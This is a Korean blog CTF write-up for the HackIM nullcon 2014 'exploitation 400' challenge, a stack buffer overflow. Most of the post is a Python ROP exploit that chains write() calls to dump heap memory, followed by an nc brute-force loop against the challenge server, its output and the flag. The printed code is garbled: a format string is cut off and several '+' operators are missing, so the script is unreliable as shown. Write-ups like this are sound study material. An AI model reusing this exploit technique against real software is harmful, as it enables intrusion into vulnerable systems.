상세 컨텐츠

본문 제목

HackIM nullcon exploitation 400 write-up [exploit]

0x10 정보보안/0x15 System

by sweetchip 2014. 1. 27. 15:29

본문

반응형



주제 : simple stack based buffer overflow


binary :

chall_heap



import time

import struct


p = lambda x : struct.pack("


write = 0x08048440


ppppr = 0x080486a6

pppr = ppppr 1

ppr = pppr 1

pr = ppr 1

r = pr 1



payload = "A" * 0x64


for i in range(0x09371008, 0x094ed008, 0x1000):

payload = p(write) # ret here

payload = p(pppr)

payload = p(1)

payload = p(i)

payload = p(0x1000)


f = open("a.txt", "wb")

f.write(payload)

f.close()


"""

root@ubuntu:/home/sweetchip/Desktop/cyber/ncon# execstack ./chall_heap

- ./chall_heap

root@ubuntu:/home/sweetchip/Desktop/cyber/ncon# while [ 1 ] ; do (cat a.txt) | nc 23.23.190.205 8976 ; done > nc.txt

^C

root@ubuntu:/home/sweetchip/Desktop/cyber/ncon# cat nc.txt | sort | uniq -c

1 ?Good Enough? Pwn Me!

1 96d1c4d1f47b666928a37f7dd6a4383e

77 Good Enough? Pwn Me!


key : 96d1c4d1f47b666928a37f7dd6a4383e


"""


위 코드로 100번정도 brute-force를 시도하면 한번정도는 키가 줄력된다


으아아ㅏ..


flag : 96d1c4d1f47b666928a37f7dd6a4383e

반응형

관련글 더보기